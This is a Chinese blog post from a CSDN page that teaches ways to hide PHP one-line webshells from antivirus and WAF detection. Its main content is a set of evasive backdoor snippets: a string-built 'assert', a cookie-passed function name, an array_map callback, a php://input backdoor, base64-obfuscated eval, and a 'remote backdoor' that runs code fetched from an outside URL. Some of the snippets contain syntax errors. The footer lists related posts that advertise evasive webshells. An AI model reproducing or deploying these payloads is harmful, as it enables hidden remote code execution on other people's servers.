一句话木马变种免杀

最新推荐文章于 2024-05-30 07:27:36 发布
最新推荐文章于 2024-05-30 07:27:36 发布
阅读量3.2k 收藏 3
点赞数 1
分类专栏: kali

常见的免杀方式:

    字符串拼接

    多方式传参免杀

    回调函数

    远程木马

    伪协议后门

    函数特性


字符串拼接免杀:


    <?php
        $str = "abcdefs";
        $s = substr($str,-1,1);
        $ev = 'a' . $s . 'sert';
        $ev($_POST['s']);

    ?>

 

多传参免杀:
    <?php

        $COOKIE = $_COOKIE;    foreach($COOKIE as $key => $value){        if($key=='assert'){
                $key($_POST['s'];)
            }
        }
    ?>


回调函数:
    //现在应该会被安全拦截,但是大家可以自己去定义个函数,抛砖引玉

    <?php
    array_map('assert',$_GET);
    ?>

 

远程后门:

    <?php

    assert($file_get_contents('http://www.0xnull.com/1.txt'));

     //其中网址内容为需要执行的代码,当然也可以使用base64编码等方式传入

    ?>

 

伪协议后门:

    调用php伪协议进行执行代码,如果被查杀可以使用一些解密函数之类的
    <?php
    assert(php://input);
    ?>

 

函数特性:

    <?php

    $a=base64_decode('ICRf______UE9T_______VFsncydd') // $_POST['s']

    eval($a);

    P师傅之前说的base64这个解码会把不认识的字符直接跳过掉,这里的下划线就属于不认识的字符

    ?>

南人旧心1906
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shell 免杀aspx_对于asp免杀webshell的一些总结
weixin_31235909的博客
12-31 627
0x00 前言现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp的免杀吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章偷偷介绍下公众号:404安全0x01 目录数组函数加密注释符类字符串操作0x02 了解asp一句话ASP解释器还有:VBScriptASP的注释符号 : ' 、 REM 当然如果你使用vbscript 注释还有 和//ASP的执行函数 :...
web渗透-php文件上传/包含漏洞测试记录
Wolf_pfD的博客
09-23 536
前言 不知不觉中这一学期已然结束,也有一段时间没有写博客了,主要是临近期末,准备各门课的课设和考试,没有什么时间来写博客。这篇博客便对期末时自己的一些不务正业做个记录。 所谓不务正业,就是在准备php课设时对web渗透产生了一些兴趣,并且做了一些尝试。在这篇博客中做一个总结分享记录。 WebShell 首先解释一下什么是WebShell,WebShell就是以asp、php、jsp或者cgi等...
一句话木马免杀,看完99%的人都学会了
2401_83739727的博客
04-14 988
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
java安全——jsp一句话木马
Innocence_0的博客
05-30 590
这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~不会回显执行的结果只能在后台打印一个地址,常用来反弹shell。如果你对网络安全入门感兴趣,那么你需要的话可以。④50份安全攻防面试指南。⑨历年CTF夺旗赛题解析。③安全攻防357页笔记。⑥HW护网行动经验总结。⑦100个漏洞实战案例。⑤安全红队渗透工具包。
shell 免杀aspx_避开eval关键字,打造免杀一句话木马
weixin_30304773的博客
01-16 1935
这年头留个php一句话木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢?首先我想到的是将eval从字符串类型赋给一个变量。如:$func = 'phpinfo';$func();这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我马上又想到了assert函数,他有着类似eval的功能,但效果并不理想...
一次另类的mssql渗透之路
include_voidmain的博客
06-08 494
一次另类的mssql渗透之路
一句话木马要点和防范注意事项
05-24
"一句话木马",顾名思义,是指利用简短的代码实现的恶意程序,它通常隐藏在网页、脚本或者其他可执行文件中,通过Web服务的漏洞进行植入,以达到远程控制或非法获取服务器权限的目的。这类木马因为其简洁高效的特点...
基于 python 实现的千倍速一句话木马密码爆破工具
最新发布
07-05
一句话木马 【作品名称】:基于 python 实现的千倍速一句话木马密码爆破工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目...
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
php一句话cmdshell新型 (非一句话木马)
10-30
【PHP 一句话 CMDShell 新型(非一句话木马)】 在 PHP 开发中,存在一种安全漏洞,称为“一句话 CMDShell”,它允许攻击者通过在 PHP 脚本中注入命令来执行系统级别的操作。虽然通常的一句话木马是直接执行 PHP ...
木马免杀只需要简单一句话的php
02-12
木马免杀只需要简单的一句话代码php文件就可以轻松过,可以参考
ASP超强提权免杀珍藏版.rar
05-29
ASP超强提权免杀珍藏版.rar
aspxwebshell免杀过杀软亲自制作
10-29
亲自制作绝对过任何杀软360,node32等aspxwebshell,已生成图片格式,你看到的是一个图片jpg文件,把后缀名改为aspx格式传上去的就是一个aspxwebshell,实现进程管理,数据库管理,文件管理,端口映射,命令行等功能,附源码生成命令copy f.jpg/b +x.aspx/a hez.jpg
过安全狗的aspx一句话webshell
02-08
过安全狗的aspx一句话webshell 纯CS模式,经典免杀
php简短一句话木马免杀,免杀/一句话木马(PHP)
weixin_39598568的博客
03-13 2339
前言在打CTF或渗透时,经常会遇到waf,普通的一句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握一句话木马免杀。Webshell检测方式网上有很多免杀一句话木马,但是如果不知道主流杀毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下一个payload。因此在此之前,先来了解一下都有哪些检测方式。日志检测使用Web...
shell 免杀aspx_Webshell免杀
weixin_39656513的博客
12-31 612
一句话木马在渗透测试中最常用的就是一句话后门(小马)和中国菜刀的配合。如果出现某种WAF防护,就寻找一个免杀的大马挂马。最常见的php一句话木马这个一句话木马由两部分组成,eval用来执行接收的代码。$_POST['x']来接收数值。本着这个原则,尝试改写一句话木马绕过WAF。搜集了几个常用的php函数执行代码的eval、assert、preg_replace接收数据的$_POST、$_GET、$...
自用php一句话木马绝对免杀没有任何关键字
不是专家的专栏
11-14 1万+
该代码是本人自己编写,可变性极大,基本不可能被查杀,代码里面没有任何关键字,而且很容易把代码弄的非常复杂。 使用方法: 1.在网站建立一个xxx.php,内容放入一句话代码。(这里是演示,xxx.php可以是任何可以访问的文件) 2.建立一个demo.html,内容如下 textarea里面写上任何想执行php的代码,注意代码格式必须规范。--> phpinfo(
整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)
热门推荐
SetToken的博客
06-03 3万+
特别推荐的一个php一句话. 菜刀可以连接,过waf,过安全狗,D盾,360,php一句话木马带404页面,带MD5加密,可浏览器POST任意php代码执行.
php一句话木马免杀
08-03
引用[1]中提到了一个关于PHP一句话木马的实验,该木马成功骗过了阿里云的检测。木马的代码被放置在服务器的php文件夹下的miansha.php文件中。该木马使用了一些技巧来绕过检测,比如设置了执行时间限制和忽略用户中止请求。木马会在循环中不断将自身代码写入一个名为phpinfo.php的文件中。[1] 引用[2]中提到了生成的phpinfo.php文件的代码。该代码使用了一些字符串替换和反转的技巧来隐藏真正的恶意代码。该木马会检查传入的GET参数,并与预设的MD5值进行比较,如果匹配则执行一些操作。[2] 引用[3]中提到了一个关于组装代码的过程,通过使用之前准备好的函数和字符串,将需要的语句拼接成一个匿名函数。[3] 总结来说,PHP一句话木马免杀是指通过一些技巧和手段来绕过安全检测,使木马代码能够成功执行而不被发现。这些技巧包括设置执行时间限制、忽略用户中止请求、使用字符串替换和反转等。然而,这种行为是非法的,违反了计算机安全和隐私保护的原则。建议用户遵守法律法规,不要从事任何违法活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值